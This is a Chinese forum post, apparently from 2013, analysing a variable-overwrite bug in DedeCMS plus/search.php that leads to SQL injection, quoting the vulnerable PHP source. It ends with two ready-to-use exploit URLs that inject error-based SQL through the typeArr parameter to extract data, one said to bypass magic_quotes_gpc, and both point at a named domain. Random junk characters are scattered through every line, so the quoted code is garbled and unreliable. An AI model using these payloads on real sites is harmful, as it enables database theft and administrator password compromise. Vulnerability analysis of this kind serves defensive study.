微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
[1 `7 Y1 N/ v \! V作者: c4rp3nt3r@0x50sec.org' F: h- R8 O. ~6 t6 ]$ w
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.9 L& K1 s4 P6 ~4 ^, S# R
; ]+ H$ j2 H- |1 e- C% z! R5 j黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.; J- @* M( }5 x8 p; `
0 B% D0 N$ a. O! Q0 O& v2 J i" `
============1 ^' S1 j7 Z7 ^/ n
y+ T6 p+ w( n, d0 T P3 n0 }; i 7 R4 M: @ v2 V' R6 W( t# F4 n& \* ?% |
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.3 _8 d# t9 B( A3 o% F% E. R
! c8 e1 g7 W! l7 ]+ V) i- B
require_once(dirname(__FILE__).”/../include/common.inc.php”);
* J9 k; e6 n1 M" g. Brequire_once(DEDEINC.”/arc.searchview.class.php”);) Q! @- Y3 t+ Z" b" X1 o% s
/ ]. C' c" C1 }$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
3 |) f2 a8 b1 \* P/ U8 {2 h$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
& g8 Q7 x* h3 R, s( z6 p$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;7 C# D: k6 |; Z8 B6 |
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
6 A# b/ ~7 H6 i8 h$ Y0 G3 Y$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;* s6 x" b7 x7 x! Q. _/ |' W+ u
o) S ^, O& H9 o& Z* b* Tif(!isset($orderby)) $orderby=”;
8 i6 `4 J8 z2 W- }) x& m% l3 [' kelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);: o" k$ d* c3 p5 k% T! v3 L1 H: l
: r, B) [$ h+ L2 y
8 Z. E3 K0 \8 p" tif(!isset($searchtype)) $searchtype = ‘titlekeyword’;5 p2 u5 F; D2 ^* x ?1 J/ X" F
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);8 H- {4 o0 e/ k0 ]$ J
8 `; ^. ?3 q' u+ `
if(!isset($keyword)){
" v: I3 s( S4 v. M; e- z6 t* R* _ if(!isset($q)) $q = ”;) V0 Z6 T& g1 o
$keyword=$q;
3 q# k0 u( _0 b( Y: O% c3 W8 v}' R. y: z% `* {& n% S* i( ~
. _7 F. L6 o" r! [$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));; @& n6 K w! T0 e5 o8 y
& |- x, [3 \. z8 q//查找栏目信息
5 U5 q0 n6 I v f' Dif(empty($typeid))! e( S& E# Y5 w0 m i# X6 q
{& ?9 T1 p h0 k. j3 s5 i
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
Z2 T( k. x0 j) {/ @ if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
1 n7 ^: N: A0 A* [ {
* l" ?' c6 X9 X/ H2 P $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);$ z8 O( J! J% o/ p2 Q0 J8 w$ A2 X
fwrite($fp, “<”.”?php\r\n”);
- ?& j) F$ t1 A& c' X8 R: j $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);2 `, B8 S6 ~6 j7 d/ X. t
$dsql->Execute();
* s a( h: {* o- |' Y# d6 U: j while($row = $dsql->GetArray())
5 ?9 ]8 m) z$ C& R K X1 t {3 o+ H& {7 l9 E$ I. g, Z
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);' u- ]' e- q' }- |
}0 D; [4 q9 k4 G. Y# E1 D; W
fwrite($fp, ‘?’.'>’);
: L4 f7 o2 c" H9 H- z fclose($fp);
6 X' k; ~2 N7 ? }+ F& o6 Y: ?7 f G% t
//引入栏目缓存并看关键字是否有相关栏目内容
7 O' M4 ^9 u- q require_once($typenameCacheFile);1 W0 \3 m. p7 m; s& i0 q7 s; z
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
; h" N) ~3 H; E//7 m0 }; }$ _$ ]) e$ P6 N
if(isset($typeArr) && is_array($typeArr))
; {0 p" H. }5 x+ E% m, K. k. H1 H {1 l6 C t$ U; o" k
foreach($typeArr as $id=>$typename)0 X5 T+ |) x0 h7 j A' B
{
# O. i6 I4 J" T
. j, g" K2 H* s9 @* X <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过" _ X( @) e7 a; X
if($keyword != $keywordn), |- T8 C. P* Q n% J; O
{
" r: c) C; G. g/ }0 N! T8 b7 R $keyword = $keywordn;1 r. ^' N" k8 P& X
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
9 y6 H' R! ~6 T7 I- | break;
" f4 U- e6 T) ?2 ^ }
$ A$ [6 ?) U6 ~: q! @) ?2 G' s, n }! b5 E: z! X, x+ ]
} g2 j4 O$ x2 z5 Q. ]" o
}0 }1 b% ?5 U' V/ \5 ^' x5 [) B
然后plus/search.php文件下面定义了一个 Search类的对象 .: d' m: b# B# a% h# w
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
( `/ ~' [2 g: a: f# {" a3 L5 ]+ g$this->TypeLink = new TypeLink($typeid);3 B7 m6 w/ x f2 G: Z. A8 m& z
+ L* X4 a" ^) U4 i2 [( p2 yTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
7 {& o3 _ B: r6 Y- s
7 }( t3 k! `0 L6 {1 D" lclass TypeLink
; E4 \5 f! K( X x3 f% k& M{
i3 R7 S3 J& J var $typeDir;% ~ A+ J* c# F' Q" q9 [' f
var $dsql;% p! X2 X' V8 o- J7 E/ M3 p
var $TypeID;! O4 c, b- ]# K& p; U
var $baseDir;
5 P7 p6 H: s+ [* a- v Q var $modDir;+ r' ?1 w+ I1 V
var $indexUrl;, D6 X$ ]1 K3 E1 S6 ?
var $indexName;6 ~1 }. P5 T! P, _
var $TypeInfos;9 X9 Y3 ?8 ?) d* f4 Z6 n4 u8 u
var $SplitSymbol;
9 B$ ]' H2 Y6 d1 N2 B9 o var $valuePosition;
' _/ M( K: x, s var $valuePositionName;2 a g) x4 G. O2 Q/ o& f* u
var $OptionArrayList;//构造函数//////// c* }9 m9 }0 u9 Z4 v
//php5构造函数
( i1 f9 T7 c; V& K' W) p! p function __construct($typeid)
2 t* D i( ]& ? {! [8 k# M6 a0 p9 t9 {
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
3 ^0 S2 O: D4 j3 c, F $this->indexName = $GLOBALS['cfg_indexname'];5 L1 a7 o$ m- d3 w0 k) n) o9 M& G
$this->baseDir = $GLOBALS['cfg_basedir'];
8 c/ O# u. u8 N. X$ v& \- O2 s$ S $this->modDir = $GLOBALS['cfg_templets_dir'];' ~, h3 G( P0 S! f! L+ ?
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
3 q- @9 p5 M9 g- L. c $this->dsql = $GLOBALS['dsql'];* `; S W$ P% s& t- ?" z
$this->TypeID = $typeid;: F- ?- a8 Q- q$ W, n, ]
$this->valuePosition = ”;
) |$ V" j3 J4 P: w. A $this->valuePositionName = ”;0 m! m+ W# a$ N( U
$this->typeDir = ”;$ e s' c$ f5 |, A
$this->OptionArrayList = ”;
, J9 L# C1 X& D/ e% _" X
4 |. ~5 p; F) t' ?. f: M //载入类目信息
; p7 P* R9 s- z+ V2 L
7 f. T; z" r6 r, y <font color=”Red”>$query = “SELECT tp.*,ch.typename as
) c2 L9 d& A- R$ d' J$ ictypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join- e @% \& d. z# }* \. d
`#@__channeltype` ch
4 _4 Q; r# t, ]: H( m! h on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿5 V% U8 I7 X/ M) A, p
" b1 J9 V, }8 W6 w. ?* l2 N* K2 n if($typeid > 0)
# l! ~& q) U+ H6 ~ {
" h' ~9 Q; [3 d0 o $this->TypeInfos = $this->dsql->GetOne($query);
) `( ?- _2 w. _! H7 S! P利用代码一 需要 即使magic_quotes_gpc = Off+ @2 K9 `" M9 n4 b4 m J
! S# _) ?% _7 P7 y. ewww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title# |: A7 \2 i% U1 R' {7 W
- Z, @: t2 O6 p2 l- ^* `2 c
这只是其中一个利用代码… Search 类的构造函数再往下
* v- X4 I8 _7 E9 r3 O7 i9 b' O
1 k9 a% S7 k- A" w……省略- S( W% P* [& `. ?4 D5 y
$this->TypeID = $typeid;+ a; O9 a; o3 c- ~- {3 t5 {
……省略
5 |# [4 F6 t a/ Jif($this->TypeID==”0″){
; h; k' G- h6 q! Y $this->ChannelTypeid=1;
% `! _( U8 p1 y9 f7 n9 l5 v }else{
! I0 P9 d* [: }7 d( G3 v $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲 j4 R* [ O" }4 @# D. V
//现在不鸡肋了吧亲…; C- `9 [5 | H
$this->ChannelTypeid=$row['channeltype'];) _0 r4 u7 j7 v0 G
1 S: q4 X6 {% q! Q4 R% _( y }. S: r3 V8 I; \7 [* n
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
* i1 R9 e4 i/ _2 a: M% h4 _6 Q
0 r- l3 m! _# S9 nwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title% j. c, u& w3 V g7 U
1 n7 ~1 n4 s: E; R+ }! I
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
4 s/ |* R( X7 O |
发表于 2013-1-19 08:18:56
收藏
分享
支持
反对